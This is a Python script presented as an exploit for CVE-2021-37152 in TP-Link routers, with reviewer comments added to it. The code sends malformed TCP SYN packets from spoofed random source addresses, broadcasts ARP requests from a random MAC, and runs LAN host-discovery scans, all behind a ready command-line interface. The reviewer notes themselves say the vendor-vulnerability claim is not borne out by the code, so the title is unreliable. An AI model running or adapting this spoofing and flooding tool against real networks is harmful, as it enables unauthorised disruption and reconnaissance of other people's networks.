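#!/usr/bin/env python3
# Exploit Title: Access network clients by sending packets in wireless TP-LINK and preparing for a mitm attack
# Date: 05.05.2021
# Exploit Author: Michael Alamoot (lhashashinl)
# Vendor Homepage: https://github.com/lhashashinl/CVE-2021-37152/
# Software Link: https://github.com/lhashashinl/CVE-2021-37152/CVE-2021-37152.py
# Version: 1.1.1
# Tested on: 5.10.0-kali7-amd64
# CVE: CVE-2021-37152
# Documentation: https://github.com/lhashashinl/CVE-2021-37152/README.md
# =========================================
# DEVELOPER Hashashin
#
# What this script actually does (read this before trusting the title):
#   * pyload()  - builds ONE malformed IPv4 datagram: a TCP SYN (ports 22 and
#                 80, spoofed random source address) whose TCP payload is the
#                 raw bytes of an ICMP echo request, an ARP request naming the
#                 default gateway, a UDP header and a caller-supplied message.
#                 It sends that `count` times, then broadcasts `countLeyer2`
#                 layer-2 ARP requests from a random MAC.
#   * scanARP/scanICMP/scanTCP/scanUDP - plain LAN host discovery.
#
# NOTE(review): nothing below talks to a TP-Link-specific service, firmware
# path or protocol; the model list from the original header (TD-W8901G,
# TD-W9960 v1.20, TL-WR840N) is the author's claim and is not exercised by
# any code in this file.  Receivers parse the datagram as an ordinary SYN with
# garbage payload; the ARP bytes inside the TCP payload are never interpreted
# as ARP by anyone.  Treat this as a packet generator / discovery helper, not
# as a demonstration of a vendor vulnerability.
#
# Raw sockets are required (root or CAP_NET_RAW).  Only run this against
# networks you are authorised to test; the source addresses are spoofed.
# ========================================================

# --- stdlib -----------------------------------------------------------------
import argparse
import ftplib
import os
import quopri
import random
import re
import readline
import socket
import socketserver
import subprocess
import sys
import weakref
import _socket
from itertools import count  # NOTE: shadowed by the `count` parameter of pyload()
from sys import argv, set_asyncgen_hooks, hash_info

# --- third party ------------------------------------------------------------
# Only scapy is used.  Every other third-party import is retained from the
# original listing; none of them is referenced below, and each one is a
# package the user must install for the script to even start.
from scapy.all import *
from scapy import *
from scapy import asn1fields, _version_from_git_describe
import qrcode
import networkx
import sockshandler
from colorama import Fore, init, Back, colorama_text
import aiohttp
import aioconsole
import requests
import fabric
import icalendar
import hashid
# lhashashinl <--~M--->
# ==================================================

# Reference captures of what pyload() emits.  Neither constant is read by the
# code; they are kept so the on-wire layout can be checked against a sniffer.
#
# rawpyload: reconstructed from a line-wrapped listing; the leading 0x45
# (IPv4 version/IHL) byte is absent in the original.  Layout: IP(id=0x0457,
# ttl=99, proto=TCP) / TCP(dport=22, seq=12345, ack=100, SYN, window=1000) /
# ICMP echo-request / ARP request (psrc 192.168.1.1, pdst 192.168.1.6) /
# UDP(53->53, len=10) / b"hi".
rawpyload = (
    b"\x00\x00V\x04W\x00\x00c\x06^3\xcc\xc1f\xa8\xc0\xa8\x01\x06$"
    b"\x04\x00\x16\x00\x0009\x00\x00\x00dP\x02\x03\xe8a\xfd\x00"
    b"\x00\x08\x00\xa0\xea\x00\x00\x00\x00\x00\x01\x08\x00\x06\x04"
    b"\x00\x01\xfc\xf8\xae\x0f\xb1\xd0\xc0\xa8\x01\x01\xff\xff\xff"
    b"\xff\xff\xff\xc0\xa8\x01\x06\x005\x005\x00\n\x00\x00hi"
)

# Same packet with message="Michael", target 192.168.1.6, gateway 192.168.1.1.
hexdumpPyload = """
0000 45 00 00 5B 04 57 00 00 63 06 FD A9 FA 4D 99 A0 E..[.W..c....M..
0010 C0 A8 01 06 31 94 00 16 00 00 30 39 00 00 00 64 ....1.....09...d
0020 50 02 03 E8 F3 E3 00 00 08 00 8B 17 00 00 00 00 P...............
0030 00 01 08 00 06 04 00 01 FC F8 AE 0F B1 D0 C0 A8 ................
0040 01 01 FF FF FF FF FF FF C0 A8 01 06 00 35 00 35 .............5.5
0050 00 0F 00 00 4D 69 63 68 61 65 6C ....Michael
"""
# ==================================================


def _local_addr(iface):
    """Return the IPv4 address of *iface* (scapy's default when None), for log lines.

    Replaces the original ``subprocess.getoutput("hostname -I")``: that spawned a
    shell for a Linux-only command and reported the host's first address rather
    than the address of the interface actually used.  Falls back to "?" so a
    cosmetic lookup can never abort a send.
    """
    try:
        return get_if_addr(iface or conf.iface)
    except (OSError, ValueError, Scapy_Exception):
        return "?"


# Attack
class exploit:
    """Packet generator plus LAN discovery helpers (see the file header).

    Parameters
    ----------
    target : str
        IPv4 address the layer-3 datagram is addressed to.
    com, hand, end, *args, **kwargs
        Accepted for backward compatibility; nothing in this class reads them.
    """

    def __init__(self, target, com=None, hand=False, end=True, *args, **kwargs):
        self.target = target
        # Volatile scapy fields: each packet build draws a fresh random value.
        self.ipr = RandIP()        # spoofed IPv4 source
        self.ip6R = RandIP6()      # unused below, kept for compatibility
        self.macr = RandMAC()      # spoofed Ethernet source for the ARP flood
        self.byteR = RandByte()    # unused below, kept for compatibility
        self.shortr = RandShort()  # random TCP source port
        self.binR = RandBin()      # unused below, kept for compatibility

    def pyload(self, message, DefaultGetway, interface, count, countLeyer2, *args, **kwargs):
        """Send the malformed SYN datagram, then broadcast ARP requests.

        Parameters
        ----------
        message : str
            Trailing bytes appended after the UDP header (``str(message)``).
        DefaultGetway : str
            IPv4 written into the ARP ``psrc`` field carried inside the TCP payload.
        interface : str | None
            Interface to send on; "" or None selects scapy's default.
        count : int
            Times the layer-3 datagram is sent.  ``dport=[22, 80]`` makes scapy
            expand the build into two packets, so 2*count datagrams leave.
        countLeyer2 : int
            Number of broadcast ARP requests sent from a random MAC.

        Returns
        -------
        The scapy packet object used for the layer-3 sends.

        Raises
        ------
        ValueError if ``count``/``countLeyer2`` are not integers.  Socket and
        scapy errors (no privileges, unknown interface) are reported on stdout
        per phase instead of being swallowed by a bare ``except``.
        """
        # Cast once; the original called int() inside the print loops only,
        # so a string count reached scapy's send() unconverted.
        count = int(count)
        count_l2 = int(countLeyer2)
        iface = interface or None

        # Explicit ihl/len/dataofs/hwlen/plen=None were scapy defaults; dropped.
        pyload = (
            IP(src=self.ipr, dst=self.target, id=1111, ttl=99)
            / TCP(sport=self.shortr, dport=[22, 80], seq=12345, ack=100, window=1000, flags="S")
            / ICMP(type="echo-request", code=0)
            / ARP(psrc=DefaultGetway, hwdst="ff:ff:ff:ff:ff:ff", pdst=self.target)
            / UDP()
            / str(message)
        )
        # Layer 2: gratuitous-looking ARP request to the broadcast IP from a random MAC.
        pyloadLeyer2 = Ether(src=self.macr, dst="ff:ff:ff:ff:ff:ff") / ARP(
            pdst="255.255.255.255", hwdst="ff:ff:ff:ff:ff:ff"
        )

        local = _local_addr(iface)
        common = f"{local} to: {self.target} interface={iface} ttl=99"

        try:
            send(pyload, count=count, iface=iface)
        except (OSError, ValueError, Scapy_Exception) as exc:
            print(f"\033[40;31;1m FAILED \033[0m send packet {common} count={count} ({exc})")
        else:
            print(f"\033[100;37;1m PYLOAD \033[0m send packet {common} count={count}")

        try:
            sendp(pyloadLeyer2, inter=.001, iface=iface, count=count_l2)
        except (OSError, ValueError, Scapy_Exception) as exc:
            print(f"\033[40;31;1m FAILED \033[0m send packet {common} count={count_l2} ({exc})")
        else:
            print(f"\033[41;37;1m PYLOAD \033[0m send packet {common} count={count_l2}")

        return pyload  # <---M--->

    # Each scanner keeps its original hard-coded range as the default; the
    # range, timeout and interface are now parameters.  The original ICMP/TCP/
    # UDP scans passed no timeout, so sr() blocked until every unanswered host
    # replied, i.e. until Ctrl-C on any real LAN.

    def scanARP(self, network="192.168.1.0/24", timeout=2, iface=None):
        """Broadcast ARP who-has over *network*; print and return the answered list."""
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network), timeout=timeout, iface=iface)
        ans.summary(lambda s, r: r.sprintf("%Ether.src% %ARP.psrc%"))
        return ans

    def scanICMP(self, network="192.168.1.1-254", timeout=2, iface=None):
        """ICMP echo sweep over *network*; print and return the answered list."""
        ans, unans = sr(IP(dst=network) / ICMP(), timeout=timeout, iface=iface)
        ans.summary(lambda s, r: r.sprintf("%IP.src% is alive"))
        return ans

    def scanTCP(self, network="192.168.1.*", timeout=2, iface=None):
        """TCP SYN to port 80 over *network*; any reply (SYN/ACK or RST) counts as alive."""
        ans, unans = sr(IP(dst=network) / TCP(dport=80, flags="S"), timeout=timeout, iface=iface)
        ans.summary(lambda s, r: r.sprintf("%IP.src% is alive"))
        return ans

    def scanUDP(self, network="192.168.*.1-10", timeout=2, iface=None):
        """UDP to port 0 over *network*; an ICMP port-unreachable reply counts as alive."""
        ans, unans = sr(IP(dst=network) / UDP(dport=0), timeout=timeout, iface=iface)
        ans.summary(lambda s, r: r.sprintf("%IP.src% is alive"))
        return ans


def main(args=None):
    """Command-line entry point.

    The original listing ended in ``e.pyload(message="", DefaultGetway="",
    interface="", count= , countLeyer2=)`` - a template with missing values
    that is a SyntaxError, and one that would fire on import if completed.
    Arguments now come from the command line and nothing runs on import.
    """
    parser = argparse.ArgumentParser(description="TP-Link packet generator / LAN discovery (see file header).")
    parser.add_argument("target", help="IPv4 address of the target host")
    parser.add_argument("--gateway", help="IPv4 written into the embedded ARP psrc (required unless --scan)")
    parser.add_argument("--interface", default=None, help="interface to send on (default: scapy's)")
    parser.add_argument("--message", default="", help="trailing payload string")
    parser.add_argument("--count", type=int, default=1, help="layer-3 sends (each expands to 2 packets)")
    parser.add_argument("--count-l2", type=int, default=1, help="broadcast ARP requests to send")
    parser.add_argument("--scan", choices=["arp", "icmp", "tcp", "udp"], help="run a discovery scan instead")
    parser.add_argument("--network", default=None, help="range for --scan (default: scanner's built-in)")
    opts = parser.parse_args(args)

    if opts.count < 0 or opts.count_l2 < 0:
        parser.error("--count and --count-l2 must be non-negative")

    e = exploit(target=opts.target)
    try:
        if opts.scan:
            scanner = {"arp": e.scanARP, "icmp": e.scanICMP, "tcp": e.scanTCP, "udp": e.scanUDP}[opts.scan]
            if opts.network:
                scanner(network=opts.network, iface=opts.interface)
            else:
                scanner(iface=opts.interface)
        else:
            if not opts.gateway:
                parser.error("--gateway is required unless --scan is given")
            e.pyload(
                message=opts.message,
                DefaultGetway=opts.gateway,
                interface=opts.interface,
                count=opts.count,
                countLeyer2=opts.count_l2,
            )
    except PermissionError:
        # sr()/srp() open raw sockets directly; pyload() reports its own errors.
        print("raw sockets require root or CAP_NET_RAW", file=sys.stderr)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())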